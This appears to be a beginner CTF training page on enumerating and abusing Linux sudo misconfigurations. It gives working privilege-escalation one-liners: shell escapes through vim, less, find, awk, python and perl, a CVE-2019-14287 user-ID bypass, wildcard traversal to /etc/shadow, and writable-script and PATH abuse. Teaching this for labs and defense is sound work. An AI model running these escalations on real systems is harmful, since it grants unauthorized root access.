Sudo Fundamentals

beginner20 minWriteup

Understanding and enumerating sudo privileges

Learning Objectives

  • Understand sudoers file
  • Enumerate sudo privileges
  • Identify sudo misconfigs
  • Check sudo version

sudo (Super User DO) allows users to run commands as other users (usually root). It's the gatekeeper between regular users and root power. Misconfigured sudo is one of the EASIEST privilege escalation vectors in CTFs and real environments.

Think of sudo as a very specific security guard. They check a list (sudoers) to see what you're allowed to do. If the list says "webuser can run vim as root" - that's it, you're root. The guard doesn't know vim can spawn shells.

First Thing to Check

"sudo -l" should be one of the FIRST commands you run after getting a shell. Many privilege escalations come directly from sudo misconfigurations.

Understanding Sudo

bash
1606070;"># How sudo works:
21. User runs: sudo command
32. Sudo checks /etc/sudoers for user's permissions
43. If allowed, command runs with target user's privileges
54. Default target = root
6 
7606070;"># Configuration file
8/etc/sudoers              606070;"># Main config
9/etc/sudoers.d/           606070;"># Additional config files
10 
11606070;"># NEVER edit sudoers directly - use:
12sudo visudo               606070;"># Validates syntax before saving

Sudoers Syntax

1606070;"># Sudoers entry format:
2606070;"># who where = (as_whom) what
3 
4606070;"># Examples:
5root    ALL=(ALL:ALL) ALL
6606070;"># root can run any command as any user on any host
7 
8webuser ALL=(root) /usr/bin/vim
9606070;"># webuser can run vim as root
10 
11backup  ALL=(root) NOPASSWD: /usr/bin/rsync
12606070;"># backup can run rsync as root WITHOUT password
13 
14%admin  ALL=(ALL) ALL
15606070;"># Anyone in admin GROUP can run anything
16 
17alice   ALL=(bob) /usr/bin/less
18606070;"># alice can run less as user 'bob'

NOPASSWD is Key

Entries with NOPASSWD don't require the user's password. Without it, you need to know the user's password to use sudo. NOPASSWD entries are instant wins.

Sudo Enumeration

bash
1606070;"># Check your sudo permissions (CRITICAL!)
2sudo -l
3 
4606070;"># Example outputs:
5 
6606070;"># Full access (easy root):
7User admin may run the following commands on target:
8    (ALL : ALL) ALL
9606070;"># → Run: sudo su - OR sudo bash
10 
11606070;"># Specific commands:
12User webuser may run the following commands on target:
13    (root) NOPASSWD: /usr/bin/vim
14606070;"># → vim shell escape: sudo vim -c ':!bash'
15 
16606070;"># Restricted but escapable:
17User backup may run the following commands on target:
18    (root) /usr/bin/less /var/log/*
19606070;"># → Can escape: sudo less /var/log/syslog → !bash
20 
21606070;"># No sudo access:
22Sorry, user guest may not run sudo on target.

Understanding the Output

1Breaking down: (root) NOPASSWD: /usr/bin/vim
2 
3(root)       = Run as root user
4NOPASSWD:    = No password required
5/usr/bin/vim = Only this specific binary
6 
7Breaking down: (ALL : ALL) /usr/bin/systemctl
8 
9(ALL : ALL)  = Run as any user : any group
10             = Can use -u and -g flags
11 
12Breaking down: ALL=(ALL) ALL
13 
14ALL          = On any host
15(ALL)        = As any user
16ALL          = Any command

Sudo Version Check

bash
1606070;"># Check sudo version (CVEs exist!)
2sudo --version
3606070;"># or
4sudo -V
5 
6606070;"># Example:
7Sudo version 1.8.31
8606070;"># → Check for Baron Samedit (CVE-2021-3156)
9 
10606070;"># Vulnerable sudo versions:
11606070;"># CVE-2021-3156 (Baron Samedit): 1.8.2 - 1.8.31p2, 1.9.0 - 1.9.5p1
12606070;"># CVE-2019-14287: < 1.8.28
13606070;"># CVE-2019-18634 (pwfeedback): 1.7.1 - 1.8.25p1
14 
15606070;"># Check if vulnerable to CVE-2019-14287 (user ID bypass)
16606070;"># If you see: (ALL, !root) /bin/bash
17606070;"># You can bypass with: sudo -u#-1 /bin/bash

Common Misconfigurations

ALL Permissions

bash
1606070;"># (ALL) ALL or (ALL : ALL) ALL
2606070;"># You can run anything as anyone
3 
4sudo su -                  606070;"># Switch to root
5sudo bash                  606070;"># Root bash
6sudo sh                    606070;"># Root sh
7sudo -i                    606070;"># Root interactive shell
8sudo /bin/bash             606070;"># Explicit root bash

NOPASSWD Entries

bash
1606070;"># NOPASSWD means no password required
2606070;"># Even restricted commands become easier
3 
4606070;"># (root) NOPASSWD: /usr/bin/find
5sudo find . -exec /bin/bash \;
6 
7606070;"># (root) NOPASSWD: /usr/bin/python
8sudo python -c 606070;">#a5d6ff;">'import pty;pty.spawn("/bin/bash")'

Script Permissions

bash
1606070;"># (root) /home/user/script.sh
2606070;"># If you can modify the script:
3echo 606070;">#a5d6ff;">'/bin/bash' >> /home/user/script.sh
4sudo /home/user/script.sh
5 
6606070;"># If the script calls other commands without full paths:
7606070;"># Use PATH manipulation

Environment Preservation

bash
1606070;"># If env_keep or SETENV is configured:
2606070;"># Environment variables are preserved
3 
4606070;"># Check with sudo -l for:
5606070;"># env_keep += "PATH"
6606070;"># or SETENV tag
7 
8606070;"># Then exploit via:
9sudo PATH=/tmp:$PATH /usr/local/bin/custom_script

GTFOBins for Sudo

has a sudo section for each binary. If sudo allows a binary, check there first.

bash
1606070;"># Common sudo escalations:
2 
3606070;"># vim/vi
4sudo vim -c 606070;">#a5d6ff;">':!bash'
5sudo vim -c 606070;">#a5d6ff;">':set shell=/bin/bash' -c ':shell'
6 
7606070;"># less/more
8sudo less /etc/passwd
9606070;"># Then: !bash
10 
11606070;"># find
12sudo find . -exec /bin/bash \;
13 
14606070;"># awk
15sudo awk 606070;">#a5d6ff;">'BEGIN {system("/bin/bash")}'
16 
17606070;"># nmap (old)
18sudo nmap --interactive
19!bash
20 
21606070;"># python
22sudo python -c 606070;">#a5d6ff;">'import pty;pty.spawn("/bin/bash")'
23 
24606070;"># perl
25sudo perl -e 606070;">#a5d6ff;">'exec "/bin/bash";'
26 
27606070;"># env
28sudo env /bin/bash
29 
30606070;"># man
31sudo man man
32!bash

Always Check GTFOBins

Even if a command seems restricted, GTFOBins often has creative exploitation methods. sudo -l + GTFOBins = frequent easy wins.

Bypassing Restrictions

bash
1606070;"># Restricted path: (root) /usr/bin/less /var/log/*
2606070;"># Wildcard might be exploitable:
3sudo /usr/bin/less /var/log/../../etc/shadow
4 
5606070;"># Or escape from less:
6sudo /usr/bin/less /var/log/syslog
7!bash
8 
9606070;"># Restricted arguments: (root) /usr/bin/vim /etc/hosts
10606070;"># Still can escape:
11sudo /usr/bin/vim /etc/hosts
12:!bash
13 
14606070;"># Restricted to specific script
15606070;"># Look for:
16606070;"># - Writable script
17606070;"># - Script calls commands without full path
18606070;"># - Script has vulnerabilities

Sudo Enumeration Methodology

Sudo Attack Flow

1
Check Permissionssudo -l (ALWAYS first)
2
Versionsudo --version (check for CVEs)
3
GTFOBinsLook up each allowed command
4
NOPASSWDPrioritize NOPASSWD entries
5
ScriptsCheck if allowed scripts are writable
6
ExploitUse appropriate technique

Knowledge Check

Quick Quiz
Question 1 of 3

What does NOPASSWD mean in a sudoers entry?

Challenges

Sudo Escalation

Challenge
🌱 beginner

Given sudo access to run vim as root, escalate to a root shell using vim's built-in features.

Need a hint? (4 available)

Key Takeaways

  • Always run "sudo -l" first during enumeration
  • NOPASSWD entries don't require password - easiest wins
  • Check each allowed binary on GTFOBins
  • Even restricted commands often have shell escapes
  • Check sudo version for known CVEs
  • Writable scripts in sudo = immediate escalation